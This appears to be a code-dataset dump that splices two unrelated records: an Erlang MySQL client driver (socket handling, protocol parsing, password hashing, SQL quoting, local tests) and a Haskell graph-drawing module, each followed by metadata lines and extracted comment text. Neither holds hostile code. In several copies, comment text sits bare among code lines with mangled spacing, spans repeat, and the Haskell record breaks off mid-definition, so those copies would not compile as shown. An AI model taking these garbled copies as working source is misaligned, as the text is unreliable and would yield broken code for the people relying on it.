[ Version , Protocol , Salt , Caps , ServerChar , Salt2 ] ) ,
{normalize_version(Version), Salt, Salt2, Caps}.
normalize_version([$4,$.,$0|_T]) ->
io:format("Switching to MySQL 4.0.x protocol.~n"),
my_sql_40;
normalize_version([$4,$.,$1|_T]) ->
my_sql_41;
normalize_version([$5|_T]) ->
MySQL version 5.x protocol is compliant with MySQL 4.1.x :
my_sql_41;
normalize_version(Other) ->
io:format("MySQL version not supported: ~p "
"MySQL Erlang module might not work correctly.~n", [Other]),
%% Error, but trying the oldest protocol anyway:
my_sql_40.
%%----------------------------------------------------------------------
%% odds and ends
asciz(Data) when is_list(Data) -> asciz_list(Data, []);
asciz(Data) when is_binary(Data) -> asciz_binary(Data, []).
asciz_list([], L) -> {reverse(L), []};
asciz_list([0|T], L) -> {reverse(L), T};
asciz_list([H|T], L) -> asciz_list(T, [H|L]).
asciz_binary(<<>>, Acc) -> {reverse(Acc), <<>>};
asciz_binary(<<0:8, Rest/binary>>, Acc) -> {reverse(Acc), Rest};
asciz_binary(<<C:8, Rest/binary>>, Acc) -> asciz_binary(Rest, [C|Acc]).
rnd(N, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
rnd(N, [], Seed1 rem Mod, Seed2 rem Mod).
rnd(0, List, _, _) ->
reverse(List);
rnd(N, List, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
NSeed1 = (Seed1 * 3 + Seed2) rem Mod,
NSeed2 = (NSeed1 + Seed2 + 33) rem Mod,
Float = (float(NSeed1) / float(Mod))*31,
Val = trunc(Float)+64,
rnd(N-1, [Val|List], NSeed1, NSeed2).
bxor_binary(B1, B2) ->
list_to_binary(zipwith(fun (E1, E2) -> E1 bxor E2 end,
binary_to_list(B1), binary_to_list(B2))).
send_mysql(Pid, Packet, Seq) when is_binary(Packet),
is_integer(Seq) ->
Pid ! {send, Packet, Seq}.
%%--------------------------------------------------------------------
get_field_datatype(0) -> 'DECIMAL';
get_field_datatype(1) -> 'TINY';
get_field_datatype(2) -> 'SHORT';
get_field_datatype(3) -> 'LONG';
get_field_datatype(4) -> 'FLOAT';
get_field_datatype(5) -> 'DOUBLE';
get_field_datatype(6) -> 'NULL';
get_field_datatype(7) -> 'TIMESTAMP';
get_field_datatype(8) -> 'LONGLONG';
get_field_datatype(9) -> 'INT24';
get_field_datatype(10) -> 'DATE';
get_field_datatype(11) -> 'TIME';
get_field_datatype(12) -> 'DATETIME';
get_field_datatype(13) -> 'YEAR';
get_field_datatype(14) -> 'NEWDATE';
get_field_datatype(16) -> 'BIT';
get_field_datatype(246) -> 'DECIMAL';
get_field_datatype(247) -> 'ENUM';
get_field_datatype(248) -> 'SET';
get_field_datatype(249) -> 'TINYBLOB';
get_field_datatype(250) -> 'MEDIUM_BLOG';
get_field_datatype(251) -> 'LONG_BLOG';
get_field_datatype(252) -> 'BLOB';
get_field_datatype(253) -> 'VAR_STRING';
get_field_datatype(254) -> 'STRING';
get_field_datatype(255) -> 'GEOMETRY'.
is_secure_connection(Caps) ->
case Caps band ?SECURE_CONNECTION of
?SECURE_CONNECTION -> true;
_ -> false
end.
do_recv(Pid) ->
receive
{Pid, {mysql, Packet, _Seq}} ->
Packet
end.
do_recv(Pid, Seq) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Packet, Seq};
{Pid, Other} ->
io:format("unexpected data:~p ~n",[Other]),
exit(1)
end.
%% Quote a string|binary|atom so that it can be included safely in a
%% mysql query
quote(X) when is_list(X) -> [$"|reverse([$"|quote(X, [])])];
quote(X) when is_binary(X) -> quote(binary_to_list(X));
quote(X) when is_atom(X) -> quote(atom_to_list(X)).
quote([], L) -> L;
quote([0|T], L) -> quote(T, [$0, $\\|L]);
quote([10|T], L) -> quote(T, [$n, $\\|L]);
quote([13|T], L) -> quote(T, [$r, $\\|L]);
quote([$\\|T], L) -> quote(T, [$\\, $\\|L]);
quote([$'|T], L) -> quote(T, [$', $\\|L]);
quote([$"|T], L) -> quote(T, [$", $\\|L]);
quote([26|T], L) -> quote(T, [$Z, $\\|L]);
quote([H|T], L) -> quote(T, [H|L]).
| null | https://raw.githubusercontent.com/joearms/elib1/d617d0ec70a058ef102749eadf51c024444c28d9/src/elib1_mysql.erl | erlang | File: mysql2.erl
Description: MySQL driver
Testing:
1)
You have to provide your own password module
like this
-module(password).
username(mysql) -> "<User>".
password(mysql) -> "<Password>".
2) You must me able to access mysql with the above username
and password.
Try the command:
$ mysql -u <User> -p
Enter password: <Password>
If this is ok then your passwords etc are correctly setup
-compile(export_all).
don't call this key
----------------------------------------------------------------------
main entry point
----------------------------------------------------------------------
try to open a socket to <Host,Port>
send Parent ! {self(), ok} if this succeeds
{self(), {error, Why}} if this fails
send data to parent if we have enough data
io:format("tosql:~p~n",[Packet]),
----------------------------------------------------------------------
do_query(...)
io:format("Fieldcount:~p~n",[Fieldcount]),
No Tabular data
io:format("Fields=~p~n",[Fields]),
be expanded to atoms:
the last packet
get_row(N, Data, L) ->
unpacks exactly N values from Data
----------------------------------------------------------------------
io:format("AuthRes=~p~n",[AuthRes]),
io:format("do old auth~n"),
io:format("do new auth~n"),
part of do_old_auth/4, which is part of mysql_init/4
----------------------------------------------------------------------
parse the initial greeting from mysql
io:format("greeting version ~p (protocol ~p) salt ~p caps ~p "
"serverchar ~p salt2 ~p~n",
Error, but trying the oldest protocol anyway:
----------------------------------------------------------------------
odds and ends
--------------------------------------------------------------------
Quote a string|binary|atom so that it can be included safely in a
mysql query | Copyright ( c ) 2006 - 2009
See MIT - LICENSE for licensing information .
-module(elib1_mysql).
Started : 4 Aug 2005
Time - stamp : < 2009 - 09 - 22 21:04:13 joe >
Notes
Origonal author :
Origonal Copyright : ( c ) 2001 - 2004 Kungliga Tekniska Högskolan
Modifications : < >
< >
run mysql2 : ) , ... etc .
Notes :
-export([username/1 , password/1 ] ) .
-export([start/2, start/3, start/4, cmd/2,
insert/2,
quote/1,
stop/1, test/1, debug/2]).
-import(lists, [reverse/1, seq/2, zipwith/3]).
-define(LONG_PASSWORD, 1).
-define(FOUND_ROWS, 2).
-define(LONG_FLAG, 4).
-define(PROTOCOL_41, 512).
-define(TRANSACTIONS, 8192).
-define(CONNECT_WITH_DB, 8).
-define(MAX_PACKET_SIZE, 1000000).
-define(SECURE_CONNECTION, 32768).
-define(MYSQL_QUERY_OP, 3).
test(1) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "show databases"),
cmd(Pid, "use test"),
cmd(Pid, "show tables"),
debug(Pid, true),
cmd(Pid, "select * from country limit 0,5"),
stop(Pid);
test(2) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "use test"),
cmd(Pid, "drop table if exists hash"),
cmd(Pid, "create table if not exists hash ("
"val longblob not null)"),
cmd(Pid, "show tables"),
cmd(Pid, "insert into hash values ('abc','123')"),
cmd(Pid, insert("hash", [test,seq(0,255)])),
V1 = cmd(Pid, "select * from hash"),
cmd(Pid, "select val from hash where k='test'"),
cmd(Pid, "update hash set val='123' where k='test'"),
V2 = cmd(Pid, "select * from hash"),
stop(Pid),
{V1,V2}.
insert(Table, Vals) when is_list(Table) ->
["insert into ", Table, " values ", value_list(Vals)].
value_list(L) ->
[$(, value_list1(L), $)].
value_list1([H]) -> quote(H);
value_list1([H|T]) -> [quote(H),$,|value_list1(T)].
debug(Pid, Flag) ->
Pid ! {debug, Flag}.
cmd(Pid, Q) ->
rpc(Pid, {do_query, Q}).
rpc(Pid, Q) ->
Pid ! {self(), Q},
receive
{Pid, Reply} ->
Reply
end.
stop(Pid) ->
Pid ! stop.
start(User, Pass) -> start("localhost", 3306, User, Pass).
start(Host, User, Pass) -> start(Host, 3306, User, Pass).
start(Host, Port, User, Pass) ->
S = self(),
Pid = spawn_link(fun() -> init(Host, Port, User, Pass, S) end),
receive
{Pid, Ret} ->
Ret
end.
init(Host, Port, User, Pass, Parent) ->
S = self(),
Pid = spawn_link(fun() -> socket_driver(Host, Port, S) end),
receive
{Pid, ok} ->
case do_auth(Pid, User, Pass) of
{ok, Vsn} ->
Parent ! {self(), {ok, self()}},
top_loop(Vsn, Pid, false);
{error,_} = E ->
Parent ! {self(), E}
end;
{Pid, Error} ->
Parent ! {self(), Error}
end.
top_loop(Vsn, Driver, Debug) ->
receive
{debug, Flag} ->
top_loop(Vsn, Driver, Flag);
stop ->
Driver ! stop;
{From, {do_query, Q}} ->
Response = do_query(Driver, Vsn, Debug, Q),
From ! {self(), Response},
top_loop(Vsn, Driver, Debug);
Any ->
io:format("top_loop unexpected message:~p~n",[Any]),
top_loop(Vsn, Driver, Debug)
end.
socket_driver(Host , Port , Parent )
socket_driver(Host, Port, Parent) ->
case gen_tcp:connect(Host, Port, [binary, {packet, 0}]) of
{ok, Sock} ->
Parent ! {self(), ok},
driver_loop(Sock, Parent, <<>>);
{error, _} = E ->
Parent ! {self(), E}
end.
driver_loop(Sock, Pid, Bin0) ->
receive
stop ->
gen_tcp:close(Sock);
{tcp, Sock, Bin1} ->
Bin2 = list_to_binary([Bin0, Bin1]),
Bin3 = sendpacket(Pid, Bin2),
driver_loop(Sock, Pid, Bin3);
{tcp_error, Sock, Reason} ->
io:format("Socket error:~p ~p~n", [Sock, Reason]),
exit(oopps);
{tcp_closed, Sock} ->
Pid ! {self(), closed};
{send, Packet, Seq} ->
Bin = <<(size(Packet)):24/little, Seq:8, Packet/binary>>,
gen_tcp:send(Sock, Bin),
driver_loop(Sock, Pid, Bin0);
Other ->
io:format("uugh:~p~n",[Other]),
driver_loop(Sock, Pid, Bin0)
end.
sendpacket(Pid, Bin) ->
case Bin of
<<Length:24/little, Num:8, D/binary>> ->
if
Length =< size(D) ->
{Packet, Rest} = split_binary(D, Length),
io : format("from mysql:~p ~ n",[{mysql , Packet , } ] ) ,
Pid ! {self(), {mysql, Packet, Num}},
sendpacket(Pid, Rest);
true ->
Bin
end;
_ ->
Bin
end.
do_query(Pid, Vsn, Debug, Query) ->
Packet = list_to_binary([?MYSQL_QUERY_OP, Query]),
Pid ! {send, Packet, 0},
Response = get_query_response(Pid, Vsn),
case Response of
{error, Str} ->
io:format("Bad query:~s~nRespnse:~s~n",[Query,Str]);
_ ->
debug(Debug, "Query=~p~nResponse=~p~n",[Query, Response])
end,
Response.
debug(false, _, _) -> void;
debug(true, Format, Data) -> io:format(Format, Data).
get_query_response(Pid, Vsn) ->
<<Fieldcount:8, Rest/binary>> = do_recv(Pid),
case Fieldcount of
0 ->
<<AffectedRows:8, _Rest2/binary>> = Rest,
{updated, AffectedRows};
255 ->
<<_Code:16/little, Message/binary>> = Rest,
{error, binary_to_list(Message)};
_ ->
Tabular data received
Fields = get_fields(Pid, [], Vsn),
Rows = get_rows(Fieldcount, Pid, []),
{data, Fields, Rows}
end.
get_fields(Pid, Res, my_sql_40) ->
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{Table, Rest} = get_with_length(Packet),
{Field, Rest2} = get_with_length(Rest),
{LengthB, Rest3} = get_with_length(Rest2),
LengthL = size(LengthB) * 8,
<<Length:LengthL/little>> = LengthB,
{Type, Rest4} = get_with_length(Rest3),
{_Flags, _Rest5} = get_with_length(Rest4),
Val = {binary_to_list(Table),
binary_to_list(Field),
Length,
TODO : Check on MySQL 4.0 if types are specified
using the same 4.1 formalism and could
binary_to_list(Type)},
get_fields(Pid, [Val|Res], my_sql_40)
end;
get_fields(Pid, Res, my_sql_41) ->
Support for MySQL 4.1.x and 5.x :
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{_Catalog, Rest} = get_with_length(Packet),
{Database, Rest2} = get_with_length(Rest),
{Table, Rest3} = get_with_length(Rest2),
OrgTable is the real table name if Table is an alias
{_OrgTable, Rest4} = get_with_length(Rest3),
{Field, Rest5} = get_with_length(Rest4),
OrgField is the real field name if Field is an alias
{_OrgField, Rest6} = get_with_length(Rest5),
<<_Metadata:8/little, _Charset:16/little,
Length:32/little, Type:8/little,
_Flags:16/little, _Decimals:8/little,
_Rest7/binary>> = Rest6,
This = {binary_to_list(Database),
binary_to_list(Table),
binary_to_list(Field),
Length,
get_field_datatype(Type)},
get_fields(Pid, [This | Res], my_sql_41)
end.
get_rows repeatedly receives rows until end - of - rows ( 254 )
is received . Each row has Nfields entries
get_rows(NFields, Pid, L) ->
Packet = do_recv(Pid),
case Packet of
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(L);
_ ->
Row = get_row(NFields, Packet),
get_rows(NFields, Pid, [Row|L])
end.
get_row(0, _) ->
[];
get_row(N, Data) ->
{Val, Data1} = get_with_length(Data),
[Val|get_row(N-1, Data1)].
get_with_length(<<251:8, B/binary>>) -> {null, B};
get_with_length(<<252:8, Len:16/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<253:8, Len:24/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<254:8, Len:64/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<Len:8, B/binary>>) when Len < 251 -> split_binary(B, Len).
do_auth(Pid , , password ) - > { ok , Version } | { error , Why }
do_auth(Pid, User, Password) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Version, Salt1, Salt2, Caps} = greeting(Packet),
AuthRes =
case is_secure_connection(Caps) of
true ->
do_new_auth(Pid,Seq+1,User,Password,Salt1,Salt2);
false ->
do_old_auth(Pid,Seq+1,User,Password,Salt1)
end,
case AuthRes of
{ok, <<0:8, _Rest/binary>>, _RecvNum} ->
{ok, Version};
{ok, <<255:8, Code:16/little, Message/binary>>, _RecvNum} ->
io:format("mysql_conn: init error ~p: ~p~n",
[Code, binary_to_list(Message)]),
{error, binary_to_list(Message)};
{ok, RecvPacket, _RecvNum} ->
io:format("mysql_conn: init unknown error ~p~n",
[binary_to_list(RecvPacket)]),
{error, binary_to_list(RecvPacket)};
{error, Reason} ->
io:format("mysql_conn: init failed receiving data : ~p~n",
[Reason]),
{error, Reason}
end;
{error, Reason} ->
{error, Reason}
end.
do_old_auth(Pid, Seq, User, Password, Salt1) ->
Auth = password_old(Password, Salt1),
Packet2 = make_auth(User, Auth),
send_mysql(Pid, Packet2, Seq),
do_recv(Pid, Seq).
do_new_auth(Pid, Seq, User, Password, Salt1, Salt2) ->
Auth = password_new(Password, Salt1 ++ Salt2),
Packet2 = make_new_auth(User, Auth, none),
send_mysql(Pid, Packet2, Seq),
receive
{Pid, {mysql, Packet3, Seq1}} ->
case Packet3 of
<<254:8>> ->
AuthOld = password_old(Password, Salt1),
send_mysql(Pid, <<AuthOld/binary, 0:8>>, Seq1 + 1),
do_recv(Pid, Seq);
_ ->
{ok, Packet3, Seq1}
end;
Other ->
{error, {oops, Pid, Other}}
end.
password_new(Pwd, Salt) ->
Hash1 = elib1_sha1:binstring(Pwd),
Hash2 = elib1_sha1:binstring(binary_to_list(Hash1)),
Res = elib1_sha1:binstring(Salt ++ binary_to_list(Hash2)),
bxor_binary(Res, Hash1).
password_old(Password, Salt) ->
{P1, P2} = hash(Password),
{S1, S2} = hash(Salt),
Seed1 = P1 bxor S1,
Seed2 = P2 bxor S2,
List = rnd(9, Seed1, Seed2),
{L, [Extra]} = lists:split(8, List),
list_to_binary(lists:map(fun (E) ->
E bxor (Extra - 64)
end, L)).
make_auth(User, Password) ->
Caps = ?LONG_PASSWORD bor ?LONG_FLAG
bor ?TRANSACTIONS bor ?FOUND_ROWS,
Maxsize = 0,
UserB = list_to_binary(User),
PasswordB = Password,
<<Caps:16/little, Maxsize:24/little, UserB/binary, 0:8,
PasswordB/binary>>.
make_new_auth(User, Password, Database) ->
DBCaps = case Database of
none ->
0;
_ ->
?CONNECT_WITH_DB
end,
Caps = ?LONG_PASSWORD bor ?LONG_FLAG bor ?TRANSACTIONS bor
?PROTOCOL_41 bor ?SECURE_CONNECTION bor DBCaps
bor ?FOUND_ROWS,
Maxsize = ?MAX_PACKET_SIZE,
UserB = list_to_binary(User),
PasswordL = size(Password),
DatabaseB = case Database of
none ->
<<>>;
_ ->
list_to_binary(Database)
end,
<<Caps:32/little, Maxsize:32/little, 8:8, 0:23/integer-unit:8,
UserB/binary, 0:8, PasswordL:8, Password/binary, DatabaseB/binary>>.
hash(S) ->
hash(S, 1345345333, 305419889, 7).
hash([C | S], N1, N2, Add) ->
N1_1 = N1 bxor (((N1 band 63) + Add) * C + N1 * 256),
N2_1 = N2 + ((N2 * 256) bxor N1_1),
Add_1 = Add + C,
hash(S, N1_1, N2_1, Add_1);
hash([], N1, N2, _Add) ->
Mask = (1 bsl 31) - 1,
{N1 band Mask , N2 band Mask}.
greeting(Packet) ->
<<_Protocol:8, Rest/binary>> = Packet,
{Version, Rest2} = asciz(Rest),
<<_TreadID:32/little, Rest3/binary>> = Rest2,
{Salt, Rest4} = asciz(Rest3),
<<Caps:16/little, Rest5/binary>> = Rest4,
<<_ServerChar:16/binary-unit:8, Rest6/binary>> = Rest5,
{Salt2, _Rest7} = asciz(Rest6),
[ Version , Protocol , Salt , Caps , ServerChar , Salt2 ] ) ,
{normalize_version(Version), Salt, Salt2, Caps}.
normalize_version([$4,$.,$0|_T]) ->
io:format("Switching to MySQL 4.0.x protocol.~n"),
my_sql_40;
normalize_version([$4,$.,$1|_T]) ->
my_sql_41;
normalize_version([$5|_T]) ->
MySQL version 5.x protocol is compliant with MySQL 4.1.x :
my_sql_41;
normalize_version(Other) ->
io:format("MySQL version not supported: ~p "
"MySQL Erlang module might not work correctly.~n", [Other]),
my_sql_40.
asciz(Data) when is_list(Data) -> asciz_list(Data, []);
asciz(Data) when is_binary(Data) -> asciz_binary(Data, []).
asciz_list([], L) -> {reverse(L), []};
asciz_list([0|T], L) -> {reverse(L), T};
asciz_list([H|T], L) -> asciz_list(T, [H|L]).
asciz_binary(<<>>, Acc) -> {reverse(Acc), <<>>};
asciz_binary(<<0:8, Rest/binary>>, Acc) -> {reverse(Acc), Rest};
asciz_binary(<<C:8, Rest/binary>>, Acc) -> asciz_binary(Rest, [C|Acc]).
rnd(N, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
rnd(N, [], Seed1 rem Mod, Seed2 rem Mod).
rnd(0, List, _, _) ->
reverse(List);
rnd(N, List, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
NSeed1 = (Seed1 * 3 + Seed2) rem Mod,
NSeed2 = (NSeed1 + Seed2 + 33) rem Mod,
Float = (float(NSeed1) / float(Mod))*31,
Val = trunc(Float)+64,
rnd(N-1, [Val|List], NSeed1, NSeed2).
bxor_binary(B1, B2) ->
list_to_binary(zipwith(fun (E1, E2) -> E1 bxor E2 end,
binary_to_list(B1), binary_to_list(B2))).
send_mysql(Pid, Packet, Seq) when is_binary(Packet),
is_integer(Seq) ->
Pid ! {send, Packet, Seq}.
get_field_datatype(0) -> 'DECIMAL';
get_field_datatype(1) -> 'TINY';
get_field_datatype(2) -> 'SHORT';
get_field_datatype(3) -> 'LONG';
get_field_datatype(4) -> 'FLOAT';
get_field_datatype(5) -> 'DOUBLE';
get_field_datatype(6) -> 'NULL';
get_field_datatype(7) -> 'TIMESTAMP';
get_field_datatype(8) -> 'LONGLONG';
get_field_datatype(9) -> 'INT24';
get_field_datatype(10) -> 'DATE';
get_field_datatype(11) -> 'TIME';
get_field_datatype(12) -> 'DATETIME';
get_field_datatype(13) -> 'YEAR';
get_field_datatype(14) -> 'NEWDATE';
get_field_datatype(16) -> 'BIT';
get_field_datatype(246) -> 'DECIMAL';
get_field_datatype(247) -> 'ENUM';
get_field_datatype(248) -> 'SET';
get_field_datatype(249) -> 'TINYBLOB';
get_field_datatype(250) -> 'MEDIUM_BLOG';
get_field_datatype(251) -> 'LONG_BLOG';
get_field_datatype(252) -> 'BLOB';
get_field_datatype(253) -> 'VAR_STRING';
get_field_datatype(254) -> 'STRING';
get_field_datatype(255) -> 'GEOMETRY'.
is_secure_connection(Caps) ->
case Caps band ?SECURE_CONNECTION of
?SECURE_CONNECTION -> true;
_ -> false
end.
do_recv(Pid) ->
receive
{Pid, {mysql, Packet, _Seq}} ->
Packet
end.
do_recv(Pid, Seq) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Packet, Seq};
{Pid, Other} ->
io:format("unexpected data:~p ~n",[Other]),
exit(1)
end.
quote(X) when is_list(X) -> [$"|reverse([$"|quote(X, [])])];
quote(X) when is_binary(X) -> quote(binary_to_list(X));
quote(X) when is_atom(X) -> quote(atom_to_list(X)).
quote([], L) -> L;
quote([0|T], L) -> quote(T, [$0, $\\|L]);
quote([10|T], L) -> quote(T, [$n, $\\|L]);
quote([13|T], L) -> quote(T, [$r, $\\|L]);
quote([$\\|T], L) -> quote(T, [$\\, $\\|L]);
quote([$'|T], L) -> quote(T, [$', $\\|L]);
quote([$"|T], L) -> quote(T, [$", $\\|L]);
quote([26|T], L) -> quote(T, [$Z, $\\|L]);
quote([H|T], L) -> quote(T, [H|L]).
|
45e606d79ea98eb28961f260b2865ff916dcd48b5f810dd6a2be479baac60299 | tuura/graph-visualisation | Visualise.hs | -----------------------------------------------------------------------------
-- |
-- Module: Visualise
-- Description : Provides a series of functions for drawing algebraic graphs.
Copyright : ( c ) 2018
--
Provides two graph drawing functions - ' drawGraph ' and ' drawGraph '' - that
-- can invoke various graph drawing functions depending on their 'Method' parameter.
-- 'drawGraph' draws a graph with default settings whereas 'drawGraph'' can be
-- provided with a 'Settings' parameter. The graph to be drawn is an instance
-- of the type graph as defined by "Algebra.Graph".
--
The five graph drawing ' Method 's defined for ' Method ' can be used for both
drawing functions , apart from ' ExpressionTree ' which can only be used for
-- 'drawGraph' not 'drawGraph'' due to its advanced parameters. Therefore
-- 'drawExpressionTree' and 'drawExpressionTree'' are reexported from
" Visualise . ExpressionTree " .
--
-- To draw a graph using "Data.GraphViz" the function 'drawWithGraphViz' from
" Visualise . GraphViz " can be used .
--
-----------------------------------------------------------------------------
module Visualise (
-- * The constructors for the graph-drawing methods.
Method(..),
* The type used to represent the dimensions of an output < Diagram > , a tuple of Maybe Doubles .
Dimensions,
* The two main graph drawing functions .
drawGraph, drawGraph',
* The function for drawing with GraphViz , reexported from " Visualise . GraphViz " .
drawWithGraphViz,
* The functions for drawing an expression tree from a graph reexported from " Visualise . ExpressionTree " .
-- 'drawExpressionTree' can be used with 'drawGraph' and the 'Method' constructor but 'drawExpressionTree'' can't as it requires extra parameters.
drawExpressionTree, drawExpressionTree',
* Saves a < Diagram > to to a specified SVG file with the specified ' ' .
saveSVG
) where
import Visualise.Common
import Visualise.Tree
import Visualise.FlatCircle
import Visualise.Hierarchical
import Visualise.FlatAdaptive
import Visualise.GraphViz
import Visualise.ExpressionTree
import Algebra.Graph
import Diagrams.Prelude hiding (Empty)
import Diagrams.Backend.SVG
import Data.GraphViz.Commands
-- | The graph drawing method
^ The ' drawTree ' function from " Visualise . Tree " module will be used to draw the graph .
^ The ' drawTreePartialOrder ' function " Visualise . Tree " module will be used to draw the graph , with all indirect dependencies removed by using the - Graham algorithm .
^ The " Visualise . FlatCircle " module will be used to draw the graph , with the verticies being placed on the vertecies of a regular polygon of n sides ( where n is the number of graph vertices ) .
^ The " Visualise . Hierarchical " module will be used to draw the graph as a hierarchical graph by grouping together vertices and groups of vertices with common connections .
^ The " Visualise . FlatAdaptive " module will be used to draw the graph , with the layout of vertices being dynamic depending on the connections between them .
^ The " Visualise . ExpressionTree " module will be used to draw an expression tree representation of the graph .
| The ' Dimensions ' data type is used to store the dimensions for writing a < Diagram > to a file . Either the width or height ( or both ) can be provided in a maybe tuple in the order ( Width , ) .
type Dimensions = (Maybe Double, Maybe Double)
-- | Draw a graph using the specified 'Method', uses the default 'Settings' for the specified drawing 'Method'.
To draw a graph using " Visualise . GraphViz " or " Visualise . ExpressionTree " , their own drawing functions must be used : for " Visualise . GraphViz " the function ' drawWithGraphViz ' and for " Visualise . ExpressionTree " the function ' drawExpressionTree ' or ' drawExpressionTree '' .
drawGraph :: (Show a, Eq a, Countable a) => Method -> Graph a -> Diagram B
drawGraph Tree = drawTree
drawGraph TreePartialOrder = drawTreePartialOrder
drawGraph Circle = drawFlatCircle
drawGraph Hierarchical = drawHier
drawGraph Adaptive = drawFlatAdaptive
drawGraph ExpressionTree = drawExpressionTree
-- | Draw a graph using the specified 'Method' and 'Settings'.
Using Lens setters the default ' Settings ' for each graph - drawing method can be customised like so :
--
-- @
ghci > g = Connect ( Vertex 1 ) ( Vertex 2 ) : : Graph Int
ghci > s = ( defaultTreeSettings g ) & directed .~ Undirected
-- ghci> d = drawGraph' Tree s g
ghci > saveSVG test_drawing.svg ( Just 1000 , Nothing ) d
-- @
--
This creates a graph of integer vertices , creates a ' Settings ' instance from the default tree drawing ' Settings ' but modifies the ' _ directed ' field using the Lens setter function to make the graph undirected .
-- Then this 'drawGraph'' function is used to draw the graph using the settings, which is then output to an svg file using the function 'saveSVG'.
drawGraph' :: (Show a, Eq a, Countable a) => Method -> Settings a -> Graph a -> Diagram B
drawGraph' Tree = drawTree'
drawGraph' TreePartialOrder = drawTreePartialOrder'
drawGraph' Circle = drawFlatCircle'
drawGraph' Hierarchical = drawHier'
drawGraph' Adaptive = drawFlatAdaptive'
| Saves a diagram to an SVG file at the specified ' FilePath ' , with the specified ' ' . Only one dimension is needed , they are given in the format :
-- @
-- (Maybe Double, Maybe Double)
-- @
saveSVG :: FilePath -> Dimensions -> Diagram B -> IO ()
saveSVG path (w,h) d = renderSVG path (mkSizeSpec2D w h) d | null | https://raw.githubusercontent.com/tuura/graph-visualisation/5609ec225de197d25283e15057a7bcdfbfc280bb/src/Visualise.hs | haskell | ---------------------------------------------------------------------------
|
Module: Visualise
Description : Provides a series of functions for drawing algebraic graphs.
can invoke various graph drawing functions depending on their 'Method' parameter.
'drawGraph' draws a graph with default settings whereas 'drawGraph'' can be
provided with a 'Settings' parameter. The graph to be drawn is an instance
of the type graph as defined by "Algebra.Graph".
'drawGraph' not 'drawGraph'' due to its advanced parameters. Therefore
'drawExpressionTree' and 'drawExpressionTree'' are reexported from
To draw a graph using "Data.GraphViz" the function 'drawWithGraphViz' from
---------------------------------------------------------------------------
* The constructors for the graph-drawing methods.
'drawExpressionTree' can be used with 'drawGraph' and the 'Method' constructor but 'drawExpressionTree'' can't as it requires extra parameters.
| The graph drawing method
| Draw a graph using the specified 'Method', uses the default 'Settings' for the specified drawing 'Method'.
| Draw a graph using the specified 'Method' and 'Settings'.
@
ghci> d = drawGraph' Tree s g
@
Then this 'drawGraph'' function is used to draw the graph using the settings, which is then output to an svg file using the function 'saveSVG'.
@
(Maybe Double, Maybe Double)
@ | Copyright : ( c ) 2018
Provides two graph drawing functions - ' drawGraph ' and ' drawGraph '' - that
The five graph drawing ' Method 's defined for ' Method ' can be used for both
drawing functions , apart from ' ExpressionTree ' which can only be used for
" Visualise . ExpressionTree " .
" Visualise . GraphViz " can be used .
module Visualise (
Method(..),
* The type used to represent the dimensions of an output < Diagram > , a tuple of Maybe Doubles .
Dimensions,
* The two main graph drawing functions .
drawGraph, drawGraph',
* The function for drawing with GraphViz , reexported from " Visualise . GraphViz " .
drawWithGraphViz,
* The functions for drawing an expression tree from a graph reexported from " Visualise . ExpressionTree " .
drawExpressionTree, drawExpressionTree',
* Saves a < Diagram > to to a specified SVG file with the specified ' ' .
saveSVG
) where
import Visualise.Common
import Visualise.Tree
import Visualise.FlatCircle
import Visualise.Hierarchical
import Visualise.FlatAdaptive
import Visualise.GraphViz
import Visualise.ExpressionTree
import Algebra.Graph
import Diagrams.Prelude hiding (Empty)
import Diagrams.Backend.SVG
import Data.GraphViz.Commands
^ The ' drawTree ' function from " Visualise . Tree " module will be used to draw the graph .
^ The ' drawTreePartialOrder ' function " Visualise . Tree " module will be used to draw the graph , with all indirect dependencies removed by using the - Graham algorithm .
^ The " Visualise . FlatCircle " module will be used to draw the graph , with the verticies being placed on the vertecies of a regular polygon of n sides ( where n is the number of graph vertices ) .
^ The " Visualise . Hierarchical " module will be used to draw the graph as a hierarchical graph by grouping together vertices and groups of vertices with common connections .
^ The " Visualise . FlatAdaptive " module will be used to draw the graph , with the layout of vertices being dynamic depending on the connections between them .
^ The " Visualise . ExpressionTree " module will be used to draw an expression tree representation of the graph .
| The ' Dimensions ' data type is used to store the dimensions for writing a < Diagram > to a file . Either the width or height ( or both ) can be provided in a maybe tuple in the order ( Width , ) .
type Dimensions = (Maybe Double, Maybe Double)
To draw a graph using " Visualise . GraphViz " or " Visualise . ExpressionTree " , their own drawing functions must be used : for " Visualise . GraphViz " the function ' drawWithGraphViz ' and for " Visualise . ExpressionTree " the function ' drawExpressionTree ' or ' drawExpressionTree '' .
drawGraph :: (Show a, Eq a, Countable a) => Method -> Graph a -> Diagram B
drawGraph Tree = drawTree
drawGraph TreePartialOrder = drawTreePartialOrder
drawGraph Circle = drawFlatCircle
drawGraph Hierarchical = drawHier
drawGraph Adaptive = drawFlatAdaptive
drawGraph ExpressionTree = drawExpressionTree
Using Lens setters the default ' Settings ' for each graph - drawing method can be customised like so :
ghci > g = Connect ( Vertex 1 ) ( Vertex 2 ) : : Graph Int
ghci > s = ( defaultTreeSettings g ) & directed .~ Undirected
ghci > saveSVG test_drawing.svg ( Just 1000 , Nothing ) d
This creates a graph of integer vertices , creates a ' Settings ' instance from the default tree drawing ' Settings ' but modifies the ' _ directed ' field using the Lens setter function to make the graph undirected .
drawGraph' :: (Show a, Eq a, Countable a) => Method -> Settings a -> Graph a -> Diagram B
drawGraph' Tree = drawTree'
drawGraph' TreePartialOrder = drawTreePartialOrder'
drawGraph' Circle = drawFlatCircle'
